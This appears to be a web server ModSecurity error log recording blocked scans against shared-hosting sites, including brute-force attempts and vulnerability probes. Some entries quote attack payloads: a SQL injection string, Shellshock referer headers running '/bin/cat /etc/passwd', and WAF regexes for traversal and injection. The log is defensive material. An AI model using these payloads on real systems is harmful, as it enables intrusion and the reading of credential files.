[Tue May 26 12:50:55.246584 2026] [security2:error] [pid 448967:tid 449135] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ1uXLPuWQsfM-UVS9RQAAACY"]
[Tue May 26 12:50:56.285569 2026] [security2:error] [pid 448967:tid 449203] [client 195.178.110.34:48038] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/.svn/wc.db"] [unique_id "ahVJ2OXLPuWQsfM-UVS9ZAAAAGo"]
[Tue May 26 12:50:56.720911 2026] [autoindex:error] [pid 448967:tid 449150] [client 34.72.176.129:24883] AH01276: Cannot serve directory /home1/micro3e1/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 12:50:57.955238 2026] [security2:error] [pid 448967:tid 449144] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ2eXLPuWQsfM-UVS9gQAAAC8"]
[Tue May 26 12:50:59.322281 2026] [security2:error] [pid 448967:tid 449102] [client 195.178.110.34:48038] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/.svn/entries"] [unique_id "ahVJ2-XLPuWQsfM-UVS9sAAAAAU"]
[Tue May 26 12:51:00.176877 2026] [security2:error] [pid 448967:tid 449110] [client 157.20.138.61:53049] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ3OXLPuWQsfM-UVS9wAAAAA0"]
[Tue May 26 12:51:00.177053 2026] [security2:error] [pid 448967:tid 449110] [client 157.20.138.61:53049] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ3OXLPuWQsfM-UVS9wAAAAA0"]
[Tue May 26 12:51:00.943524 2026] [security2:error] [pid 448967:tid 449121] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ3OXLPuWQsfM-UVS9zAAAABg"]
[Tue May 26 12:51:03.707140 2026] [security2:error] [pid 448967:tid 449146] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ3-XLPuWQsfM-UVS-KQAAADE"]
[Tue May 26 12:51:04.043658 2026] [security2:error] [pid 448967:tid 449102] [client 78.46.215.1:17332] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVJ3-XLPuWQsfM-UVS-LQAAAAU"], referer: https://thegoodsporting.com
[Tue May 26 12:51:05.098665 2026] [core:error] [pid 448967:tid 449211] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:51:05.098703 2026] [core:error] [pid 448967:tid 449211] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:51:05.098821 2026] [security2:error] [pid 448967:tid 449211] [client 195.178.110.34:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/index.php"] [unique_id "ahVJ4eXLPuWQsfM-UVS-XQAAAHI"]
[Tue May 26 12:51:05.099460 2026] [security2:error] [pid 448967:tid 449178] [client 195.178.110.34:51660] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVJ4eXLPuWQsfM-UVS-WgAAAFE"]
[Tue May 26 12:51:05.903072 2026] [security2:error] [pid 448967:tid 449098] [client 74.7.230.32:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.juniorwoodies.glorodavionics.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVJ4eXLPuWQsfM-UVS-dAAAAAE"]
[Tue May 26 12:51:05.917936 2026] [security2:error] [pid 448967:tid 449223] [client 74.7.230.32:40860] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.juniorwoodies.glorodavionics.com"] [uri "/robots.txt"] [unique_id "ahVJ4eXLPuWQsfM-UVS-cAAAfiw"]
[Tue May 26 12:51:06.491976 2026] [security2:error] [pid 448967:tid 449196] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ4uXLPuWQsfM-UVS-egAAAGM"]
[Tue May 26 12:51:09.182039 2026] [security2:error] [pid 448967:tid 449121] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ5OXLPuWQsfM-UVS-uAAAABg"]
[Tue May 26 12:51:10.559493 2026] [security2:error] [pid 448967:tid 449213] [client 23.94.40.119:34730] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/seeyon/htmlofficeservlet"] [unique_id "ahVJ5uXLPuWQsfM-UVS-7AAAAHQ"]
[Tue May 26 12:51:10.597817 2026] [security2:error] [pid 448967:tid 449147] [client 23.94.40.119:34698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:ostype. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "/../,ARGS:ostype"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/vpn/user/download/client"] [unique_id "ahVJ5uXLPuWQsfM-UVS-9QAAADI"]
[Tue May 26 12:51:10.599040 2026] [security2:error] [pid 448967:tid 449123] [client 23.94.40.119:34680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:fileNames[]. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "/../,ARGS:fileNames[]"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/export/classroom-course-statistics"] [unique_id "ahVJ5uXLPuWQsfM-UVS-9gAAABo"]
[Tue May 26 12:51:10.619780 2026] [security2:error] [pid 448967:tid 449115] [client 23.94.40.119:34738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/general/index/UploadFile.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS-7QAAABI"]
[Tue May 26 12:51:10.619904 2026] [security2:error] [pid 448967:tid 449157] [client 23.94.40.119:34772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/scripts/setup.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS-8AAAADw"]
[Tue May 26 12:51:10.637763 2026] [security2:error] [pid 448967:tid 449212] [client 23.94.40.119:34580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/public/index.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS--AAAAHM"]
[Tue May 26 12:51:10.638227 2026] [security2:error] [pid 448967:tid 449102] [client 23.94.40.119:34626] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/weaver/org.apache.xmlrpc.webserver.XmlRpcServlet"] [unique_id "ahVJ5uXLPuWQsfM-UVS--wAAAAU"]
[Tue May 26 12:51:10.638257 2026] [security2:error] [pid 448967:tid 449182] [client 23.94.40.119:34596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php/User/doLogin"] [unique_id "ahVJ5uXLPuWQsfM-UVS--gAAAFU"]
[Tue May 26 12:51:10.640191 2026] [security2:error] [pid 448967:tid 449223] [client 23.94.40.119:34650] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/dataSetParam/verification;swagger-ui/"] [unique_id "ahVJ5uXLPuWQsfM-UVS_AAAAAH4"]
[Tue May 26 12:51:10.640230 2026] [security2:error] [pid 448967:tid 449098] [client 23.94.40.119:34612] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:lang. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "/../,ARGS:lang"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVJ5uXLPuWQsfM-UVS-_AAAAAE"]
[Tue May 26 12:51:10.641270 2026] [security2:error] [pid 448967:tid 449107] [client 23.94.40.119:34776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS-6wAAAAo"]
[Tue May 26 12:51:10.641435 2026] [security2:error] [pid 448967:tid 449185] [client 23.94.40.119:34648] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:(?:truncate|truncate|rename)[[:space:]]+[a-z| |0-9|\\\\*|\\\\.|\\\\,|\\\\(|\\\\)|_|\\\\-]+[[:space:]]+(?:into|from|table|database|index|view)[[:space:]]+[a-z|0-9|\\\\*| |\\\\{|\\\\.|\\\\,|\\\\(|\\\\)|_|\\\\-]|\\\\bunion\\\\b.{1,256}?select.{1,256}[a-z0-9\\\\(\\\\)].{1,256}(?:from|#| ..." at ARGS:id. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "296"] [id "340016"] [rev "46"] [msg "Atomicorp.com WAF Rules: Attack Blocked - SQL injection attempt detected"] [data "union select md5(999999999) as id from"] [severity "CRITICAL"] [tag "SQLi"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/upgrade/detail.jsp/login/LoginSSO.jsp"] [unique_id "ahVJ5uXLPuWQsfM-UVS-_wAAAFg"]
[Tue May 26 12:51:10.649834 2026] [security2:error] [pid 448967:tid 449135] [client 23.94.40.119:34788] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS-8QAAACY"]
[Tue May 26 12:51:10.737734 2026] [core:error] [pid 448967:tid 449119] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:51:10.737765 2026] [core:error] [pid 448967:tid 449119] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:51:10.737917 2026] [security2:error] [pid 448967:tid 449119] [client 195.178.110.34:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/index.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS_BAAAABY"]
[Tue May 26 12:51:10.738686 2026] [security2:error] [pid 448967:tid 449195] [client 195.178.110.34:51666] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVJ5uXLPuWQsfM-UVS_AQAAAGI"]
[Tue May 26 12:51:10.754679 2026] [security2:error] [pid 448967:tid 449144] [client 23.94.40.119:34814] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/zentao/user-login.html"] [unique_id "ahVJ5uXLPuWQsfM-UVS_CAAAAC8"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in/zentao/user-login.html
[Tue May 26 12:51:10.880061 2026] [security2:error] [pid 448967:tid 449206] [client 157.20.138.61:53406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS_AwAAAG0"]
[Tue May 26 12:51:10.880321 2026] [security2:error] [pid 448967:tid 449206] [client 157.20.138.61:53406] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS_AwAAAG0"]
[Tue May 26 12:51:11.103531 2026] [security2:error] [pid 448967:tid 449127] [client 23.94.40.119:34796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVJ5-XLPuWQsfM-UVS_DwAAAB4"]
[Tue May 26 12:51:11.658067 2026] [security2:error] [pid 448967:tid 449222] [client 23.94.40.119:34844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/lcms/index.php"] [unique_id "ahVJ5-XLPuWQsfM-UVS_JQAAAH0"]
[Tue May 26 12:51:11.658506 2026] [security2:error] [pid 448967:tid 449219] [client 23.94.40.119:34826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/images/logo/logo-eoffice.php"] [unique_id "ahVJ5-XLPuWQsfM-UVS_JgAAAHo"]
[Tue May 26 12:51:11.828312 2026] [security2:error] [pid 448967:tid 449030] [remote 45.55.33.147:50810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.33.55.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVJ5-XLPuWQsfM-UVS_JAAAcz4"]
[Tue May 26 12:51:12.003295 2026] [security2:error] [pid 448967:tid 449111] [client 23.94.40.119:34884] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:lang. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "/../,ARGS:lang"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVJ6OXLPuWQsfM-UVS_LQAAAA4"]
[Tue May 26 12:51:12.025949 2026] [security2:error] [pid 448967:tid 449134] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ5-XLPuWQsfM-UVS_IgAAACU"]
[Tue May 26 12:51:12.892431 2026] [security2:error] [pid 448967:tid 449025] [remote 84.247.129.9:57312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.129.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVJ6OXLPuWQsfM-UVS_PgAACzk"]
[Tue May 26 12:51:13.230902 2026] [security2:error] [pid 448967:tid 449050] [remote 167.172.25.98:55506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVJ6eXLPuWQsfM-UVS_RgAAdlI"]
[Tue May 26 12:51:13.434024 2026] [security2:error] [pid 448967:tid 449129] [client 23.94.40.119:34966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/guest_auth/guestIsUp.php"] [unique_id "ahVJ6eXLPuWQsfM-UVS_VAAAACA"]
[Tue May 26 12:51:13.434175 2026] [security2:error] [pid 448967:tid 449129] [client 23.94.40.119:34966] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/guest_auth/guestIsUp.php"] [unique_id "ahVJ6eXLPuWQsfM-UVS_VAAAACA"]
[Tue May 26 12:51:13.572933 2026] [security2:error] [pid 448967:tid 449148] [client 23.94.40.119:34988] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx"] [unique_id "ahVJ6eXLPuWQsfM-UVS_WQAAADM"]
[Tue May 26 12:51:13.645418 2026] [security2:error] [pid 448967:tid 449135] [client 23.94.40.119:35004] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/backupmgt/localJob.php"] [unique_id "ahVJ6eXLPuWQsfM-UVS_XAAAACY"]
[Tue May 26 12:51:13.874771 2026] [security2:error] [pid 448967:tid 449195] [client 23.94.40.119:35020] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVJ6eXLPuWQsfM-UVS_YwAAAGI"]
[Tue May 26 12:51:14.226889 2026] [security2:error] [pid 448967:tid 449206] [client 23.94.40.119:35068] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ahVJ6uXLPuWQsfM-UVS_bQAAAG0"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 12:51:14.235312 2026] [security2:error] [pid 448967:tid 449105] [client 23.94.40.119:35036] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVJ6uXLPuWQsfM-UVS_bgAAAAg"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 12:51:14.384527 2026] [security2:error] [pid 448967:tid 449193] [client 23.94.40.119:35092] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/test-cgi"] [unique_id "ahVJ6uXLPuWQsfM-UVS_cgAAAGA"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
